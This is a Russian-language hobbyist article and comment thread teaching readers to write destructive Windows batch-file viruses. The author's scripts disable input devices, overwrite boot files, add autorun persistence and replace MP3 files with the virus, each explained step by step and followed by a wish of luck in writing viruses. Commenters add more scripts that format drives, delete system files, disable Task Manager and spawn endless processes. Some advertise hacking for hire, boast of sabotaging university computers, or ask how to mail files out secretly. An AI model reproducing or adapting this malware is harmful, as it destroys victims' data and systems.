Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием “Учим ДОС”, то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым … [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.
Вот тело моего первого вируса
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
Объясняю популярно и по шагам:
1 @echo off – Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable – Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system – Копируемся в папку windows/system
// %0 – Переменная, указывающая на исходный файл-вирус
// %windir% – переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini – Добавляет текст “run=%windir%/system/*.bat” в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini – Добавляет текст “run=%windir%/system/*.bat” в файл system.ini
7 label LOHOLAMMER – Меняет имя диску c:\ на “LOHOLAMMER”
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r – Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat – Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat – Добавить текст “YOU ARE LAMMER…xe-xe-xe”
//в новый файл autoexec.bat
11 rundll32 mouse,enable – Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable – Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r – Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause – Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls – Выходим
Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать ‘Вы ламер.’ .Работает только в винде до 2000.
Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.
@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите… //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER….[]=[_H@CKED_BY_[kas]*_”SmallPox_Vir_Org”_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. А теперь необходимо перезагрузиться”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls
А теперь, что-то новое.
@echo off
cls
echo Please wait, updating system…
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.
Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:
ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
” Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ‘ ‰?ђ Ќ ё.%Н.Ќ є Н’ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите… //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.inicopy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход
О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).
Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.
Вот вы дибилы все Ученики ебаные смотри :
@Echo off
Start.cmd
Start.cmd
Start.cmd
Start.cmd
Start.cmd
Итак далее до бесконечности писать и тогда может Заглючить Комп За 1 сек вот вы дибилы Это что вы пишите свои вирусы полная Хуйня у вас!!!
Итак Я Ломаю :
Css,Сайты Компы стим акки Skype Аськи Мыло Делаю вирусы на заказ!!!не так как вы Дибилы кароче хотите крутой вирус или взлом на заказ? стучать в Skype Noggano55rus ток без выёбак ок?
А есть ли такой вирус который выводит на экран пароль в мэйл.ру какого ни будь пользователя:
Нап: Я закину этот вир кому нибудь и он выдает его пароль???
Очень хороший вирус. Кемп просто зависает.
@echo off
copy “”%0″” “%SystemRoot%\system32\Dervik.bat”
reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “Filel” /t REG_SZ /d “%SystemRoot%\system32\Dervik.bat” /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
:x
Start chkdsk
goto :x
Panyk некоторые сюда зашли вообще чтобы хоть что то узнать.К примеру у меня в школе вообще не изучают ни языки программирования, ни вообще ни фига, только тексты набираем в ворде, а кроме как вирусы писать никто ничему не учит, по крайней мере мне не попалось ни одного бесплатного пособия.
Админ спасибо за вирусы, все работает прекрасно я учетелям в универе так подосрал у мя информатики не было 4 дня, разберались в чем проблема =)))))
@echo off
echo(On_your_computer_a_virus_is_detected_press_any_button_to_remove_it)
pause
del “%SystemRoot%Media” /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
net user “лох” /add >nul
pause
time 0:00 >nul
date 12.12.12
pause
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del “%SystemRoot%Cursors*.*” >nul
pause
Chcp 1251
msg * “Все вирусы найдены. Удалить? Если да то нажмите ок и далее нажимайте на любые кнопки.”
pause
FOR /L %%i IN (1,1,1000000) DO md %%i
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul –
taskkill /f /im explorer.exe >nul
del “%SystemRoot%Driver Cachei386driver.cab” /f /q >nul
del “%SystemRoot%system32*.dll” /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
pause
echo format C: /q >> c:Autoexec.bat
copy c:some.exe c:Progra~1some.exe
Cd
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd
cd windows
cd system
del *.dll
del *.exe
pause
:LOOP
copy %windir%*.* + %windir%*.* c:command.com
GOTO LOOP
@ P-¦ r 4 P PT
deltree /y %windir% c:program files
shutdown -r -t 1 -c “lol” -f
del “%0” >nul
Вот такой шуточный вирус)))
Памагите плиз , вчера случайно у ся на копмпе запустил
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:Open.bat >nul
copy %0 D:Open.bat >nul
copy %0 E:Open.bat >nul
copy %0 F:Open.bat >nul
net user “Idiot you Hacked” /add >nul
net user “Bitch you Hacked” /add >nul
net user “Durak you Hacked” /add >nul
net user “Kritin you Hacked” /add >nul
net user “Gavno you Hacked” /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy “”%0″” “%SystemRoot%system32Cool.bat” >nul
reg add “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun” /v “Cool” /t REG_SZ /d “%SystemRoot%system32Cool.bat” /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul
ЧЕ ТЕРЬ ДЕЛАТЬ??Г???Некакаая программа не работает !!!!!!!!!!!!!ПАМАГИТЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ!!!!!!!!!!!!!!!!!!!!!!!как отменить дейсвие бантика етого??????????????
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
echo WSHShell.Popup(“Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
rundll32 mouse,enable
rundll32 keyboard,enable
pause
cls
СКАЖЫТЕ БУДЕТЕТ РАБОТАТЬ ПРОГА
да вы малорики парни
Не думаю
Убийца explorer’a taskkill /F /IM explorer.exe
Как сделать форматирование жесткого диска скрытно?
Как сделать форматирование жесткого диска скрытно?
Спасибо ВетОС
@cls
@echo off
taskkill /F /IM explorer.exe
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
END
EXIT
oOOOO супер вирус !!! мой антивирус нашел в нем ТРОЯН и сразу изолировал!! крутяк теперь я буду это отправлять друзья то есть врагам xD )) админ респект!!
вопше круто,,,ток напишите на мыло,можно ли занести его в автозагрузку и прикрипить программы для управления компом!!!!
народ помогите написать вирус который распространяется по сетке и форматирует все жесткие диски. спс заранее
Статья неплохая, хотя многое мне было уже известно. Хочу вам подсказать неплохую программу для конвертирования bat-файлов в exe! Называется она Bat to Exe Converter. Несмотря на маленький размер, она позволяет увеличивать размер файла, изменять иконку, добавлять описание, права. Сам уже пользуюсь полтора года.
Также хочу посоветовать скриптовый язык VBScript. Кто заинтересовался, пишите на почту alex1994mal@mail.ru
кинь вирус в автозагрузку C:\Documents and Settings\Admin\Главное меню\Программы\Автозагрузка
Не плохо :))
Жуть :)
Перезапуск Explorer а (проводникака)
[code]
@echo off
tasklist
taskkill /f /t /im “explorer.exe”
start %WinDir%\explorer.exe
Chcp 1251
msg * Готово
exit
[/code]
Все прочитал…многое знаю! Кто реально умеет все это делать и научит меня – я с ним щедро россчитаюсь… Писать в скайп 0 Sijey1994 /// ИЛи на почту haker-n@ukr.net
hello
кнекнк
помогите как сделать чтобы папка отправилась на почтовый ящик с помощью bat файла.
плиз!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Админчик прошу тебя помоги мне вот мой скайп google_97
https://vk.com/google_kva и ссылка в вк пажалуста
Ёще один .bat вирус
@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:DURAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user “Idiot you Hacked” /add >nul
net user “Bitch you Hacked” /add >nul
net user “Durak you Hacked” /add >nul
net user “Kritin you Hacked” /add >nul
net user “Gavno you Hacked” /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nu
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ; Start mspaint goto x ;
:x ; Start Calc goto x ;
ну этот еще цветочки.Я скинул 2 опасных вируса кроме этого!!!!!!!!!!!
@Echo off
с:
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul помоги пожалуста почему не работает ?? обЪясни если время есть
доброе время суток! подскажитье што будет если сделанный мною вирус поместить в портфель! што будет??? )))))
и как он будет работать если его поместить на другую тачку!
